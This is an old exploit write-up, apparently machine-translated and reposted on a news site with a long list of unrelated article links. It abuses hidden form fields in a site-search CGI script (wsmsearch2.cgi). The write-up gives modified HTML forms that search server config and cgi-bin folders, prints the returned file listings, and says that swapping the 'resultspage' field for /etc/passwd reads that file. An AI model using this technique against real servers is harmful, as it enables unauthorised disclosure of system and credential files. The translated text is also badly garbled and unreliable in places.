Leaking of information about the server through a hidden field html-code
[2003/10/08, durito]
In a html-code index'noy www.xxx.com server pages have such a fragment: (unnecessary design elements removed)
as has become clear, it is the script search site system. but these lines are especially interesting:<Form method = POST action = .. / .. / cgi-bin / wsmsearch2.cgi> Search Site: <input type = text name = terms size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = case value = Insensitive> <input type = hidden name = quicksearch value = NO> <input type = hidden name = max value = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _ http://www.xxx.com/ _ *. * manual / updates / _ http://www.xxx.com "> <input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html> <input type = submit value = Search!>
<Input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _ http://www.xxx.com/ _ *. * manual / updates / _ http://www.xxx.com "> <input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html>
/opt2/xxx/httpd/htdocs
- this is the way The installation site, but that's not all. Search script takes its data from a hidden form:
that is, the search carried out in folders:<Input type = hidden name = boolean value = AND> <input type = hidden name = case value = Insensitive> <input type = hidden name = quicksearch value = NO> <input type = hidden name = max value = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs _ http://www.xxx.com/ _ *. * manual / updates / _ http://www.xxx.com "> <input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html>
manual/ updates/
and the root server folder http://www.xxx.com/ _ *.*
(it is interesting that this script was found poikovogo file:
www_xxx_user_list.txt
in the server root, it is a list of users). so here it is possible to manipulate the query script. create html but with this code:
that is, just remove the lines:<Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi>Search Site: <input type = text name = terms size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = case value = Insensitive> <input type = hidden name = quicksearch value = NO> <input type = hidden name = max value = 50> <input type = hidden name = faqfile value = / opt2 / xxx / httpd / htdocs> <input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html> <input type = submit value = Search!>
_ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com
and perform a search query on the entire site. You can also search for files and
/opt2/xxx/httpd/htdocs/cgi-bin/
: Now it has been found that as a result of these requests:<Form method = POST action = .. / .. / .. / www.xxx.com/cgi-bin/wsmsearch2.cgi>Search Site: <input type = text name = terms size = 20> <input type = hidden name = boolean value = AND> <input type = hidden name = case value = Insensitive> <input type = hidden name = quicksearch value = NO> <input type = hidden name = max value = 50> <input type = hidden name = faqfile value = "/ opt2 / xxx / httpd / htdocs_ http://www.xxx.com/ _ *. * cgi-bin / _ http://www.xxx.com "> <input type = hidden name = resultspage value = / opt2 / xxx / httpd / htdocs / results.html> <input type = submit value = Search!>
Here are your search results for the keyword (s) conf.dont_use in order of relevance. 1) conf.dont_use / srm.conf.old SIZE: 7354 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 2) conf.dont_use / srm.conf SIZE: 7436 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 3) conf.dont_use / sessiond.conf SIZE: 159 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 4) conf.dont_use / mime.types SIZE: 2652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 5) conf.dont_use / imagemap.conf SIZE: 1062 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 6) conf.dont_use / httpsd.conf.dave SIZE: 43652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 7) conf.dont_use / httpsd.conf.11-20-2001 SIZE: 43841 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 8) conf.dont_use / httpsd.conf-backup SIZE: 13243 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 9) conf.dont_use / httpsd.conf SIZE: 43927 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 10) conf.dont_use / httpd.conf.vhback SIZE: 7225 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 11) conf.dont_use / httpd.conf.11-20-2001 SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 12) conf.dont_use / httpd.conf SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 13) conf.dont_use / access.conf SIZE: 1725 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0and another script:
Here are your search results for the keyword (s) securedata in order of relevance. 1) cgi-bin / conf.dont_use / resetsecuredata.cgi SIZE: bytes TYPE: CGIssript Term: securedata Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
Well-loved
/etc/passwd
is obtained quite simply: simply the value of the hidden field resultspage
replaced by /etc/passwd
. This is how server administrators sometimes try to patch up all sorts of holes, nakatyvaya the latest patches, and the information leaked from a html-code.
your bug Durito
_________________
EAT THE RICH!
Copyright 2002-2003 by void.ru All rights reserved.
Liked? Subscribe to RSS news!
You can also support shram.kiev.ua, click:
You can also support shram.kiev.ua, click:
Do not be amiss to your friends and find out this information, share with them the article!
- Driving all the municipal transport in Kiev Photo 2017-02-28
- How often should you have sex according to age Photo 2017-02-28
- Calendar Fishing and fish forecast Peace / predatory fish for 2017. Photo 2017-02-26
- Fishing knots how to tie a hook, preparing to fly Photo 2017-02-26
- Euthanasia Coaster, a roller coaster project intended for the death penalty Photo 2017-02-26
- WEB page may be evidence in court Photo 2017-02-26
- In this cosplay you want to play yourself Photo 2017-02-25
- Elegant collection of girls from Japan. Photo 2017-02-25
- Paste GOI (from GOI - State Optical Institute) Photo 2.24.2017
- Unnecessary things that should quickly get rid Photo 2017-02-24
- Bad daily habits, because of which there is bloating Photo 2017-02-24
- Control levers aircraft engines (ORE), you never know ... Photo 2/24/2017
- Modern Design Business Card Photo 2017-02-23
- Cats, artist Vladimir Rumyantsev Photo 2017-02-23
- Interesting facts about the film Prometheus Photo 2017-02-23
- As reported on the NASA conference? Photo 2017-02-21
- SSL certificate format, how to convert a certificate in .pem, .cer, .crt, .der, pkcs or the pfx Photo 21/02/2017
- Types of bleeding and first aid rules you need to know! Photo 2017-02-20
- Early signs of diabetes, you must not ignore! Photo 2017-02-20
- Household mistakes that kill the beauty of the interior Photo 2017-02-20
- Serebro Group in Maxim magazine, March 2017 Photo 2017-02-20
- As a matter of fact 2-3 day children see the world immediately after birth Photo 2017-02-18
- Full guide shoes for men Photo 2017-02-18
- Hijab, chador, burqa - what's the difference? Photo 2017-02-18
- Effective yoga poses for a beautiful and resilient chest Photo 2017-02-15
- How to parallel park? Photo 2017-02-15
- Vegetable oils, information about each Photo 2017-02-13
- Stereo Pictures (more than 127 pieces) + how they look Photo 2017-02-12
- What time of day is best to eat certain foods Photo 2017-02-12
- Ideas for creating clay toys from which children will be delighted Photo 2017-02-12
- Dirty tricks that are used by all controllers and slippery people, you've already caught them hooked? Photo 2017-02-11
- Driving all of Kiev municipal transport Scheme marked all bus, trolleybus and tram routes, and ... Photo 2017-02-28
- How often should you have sex according to age Many people are curious to know, engage in sex, they are too many or too ... Photo 2017-02-28
- Calendar Fishing and fish forecast Peace / predatory fish in 2017 There are certain phases of the light when you just need to be alone ... Photo 2017-02-26
- Fishing knots how to tie a hook, preparing to fly Node Type selected according to the type of fishing line (monofilament or ... Photo 2017-02-26
- Euthanasia Coaster, a roller coaster project intended for the death penalty The author acknowledges that roller coasters are not the optimal machine for ... Photo 2017-02-26
- WEB page may be evidence in court should be understood that, for example, copyright does not itself violate the existing ... Photo 2017-02-26
- In this cosplay, you will want to play basic games prototypes costume - cartoon characters, anime, video games, movies, ... Photo 2017-02-25
- Elegant collection of girls from Japan. Japanese (Jap nihondzin / nippondzin, Nihon minzoku.) - The people, the main (over 98%) ... Photo 2017-02-25
- Paste GOI (from GOI - State Optical Institute) GOI paste can be used for polishing of products from various ... Photo 2017-02-24
- Unnecessary things that should quickly get rid Read reflection, in which you will learn how to let go of ... Photo 2017-02-24
- Bad daily habits, because of which there is bloating believed that bloating - it is not a separate illness, but ... Photo 2017-02-24
- Control levers aircraft engines (ORE), you never know ... Lever Engine Control (RUD) - powertrain management body aircraft ... Photo 2017-02-24
- Modern Design Business Card tors card (card) - Traditional media contact information about a person ... Photo 2017-02-23
- Cats, artist Vladimir Rumyantsev Vladimir Rumyantsev, born in 1957, began to paint at the age of ... Photo 2017-02-23
- Interesting facts about the film Prometheus Who are we really? Where did come from and where ... Photo 2017-02-23
- As reported on the NASA conference? Open 7 exoplanet system TRAPPIST-1 red dwarf; All ... Photo 2017-02-21
- SSL certificate format, how to convert a certificate in .pem, .cer, .crt, .der, pkcs or pfx for successful installation and operation of SSL certificates across multiple platforms ... Photo 2017-02-21
- Types of bleeding and first aid rules you need to know! The need for first aid for bleeding caused by a health hazard ... Photo 2017-02-20
- Early signs of diabetes, you must not ignore! Diabetes is a very serious disease that causes a lot of dangerous ... Photo 2017-02-20
- Household mistakes that kill the beauty of the interior No matter how much fuss over design in my apartment, I do not ... Photo 2017-02-20
- Serebro Group in Maxim magazine, March 2017 Olga, Katya and Polina are eager to get married - it is ... Photo 2017-02-20
- Cats. Painter Vladimir Rumyantsev. Photo 2017-02-23
- "Prometheus" - Interesting Facts Photo 2017-02-23
- Seen Lithuanian cheerleaders? Worth seeing! 02/23/2017
- Olsen, Elizabeth / Elizabeth Olsen Photo 02.23.2017
- She sat by the window, and he went into her car ... Photo 02.23.2017
- Photo Cats, Cats, Kittens Photo 2017-02-23
- How can run Turtle Photo 2017-02-23
- Bengal Cat Talking With Kitten 23/02/2017
- National Bank has issued a new coin (Photo) Photo 02.23.2017
- Protasov Yar 30 years ago Photo 2017-02-23
- Photo Animals Photo 2017-02-23
- Translation NASA What is said at the Conference of Nasa Photo 23.02.2017
- Something about the size of Jupiter, Races "Through" Sun Photo 2017-02-22
- Central streets of Kiev will block for five days Photo 2017-02-20
- 3 Ways to Make People Vagina bottleneck and firmness Photo 2017-02-20
- Monica Bellucci Gq Magazine in Italy, February 2017 Photo 2017-02-20
- «Serebro» Group B Magazine Maxim, March 2017 Photo 2017-02-20
- What to Do If you are detained by police - Article 146 Piracy Photo 2017-02-20
- There is a new free OS Photo 2017-02-18
- Wood under the electron microscope Photo 2017-02-18
- Payment Card Market in 2016 showed significant growth Photo 2017-02-18
social
loading...
Your IP: 66.102.9.131
Your Country: United States
Your Region: California
Your City: Mountain View
Your Country: United States
Your Region: California
Your City: Mountain View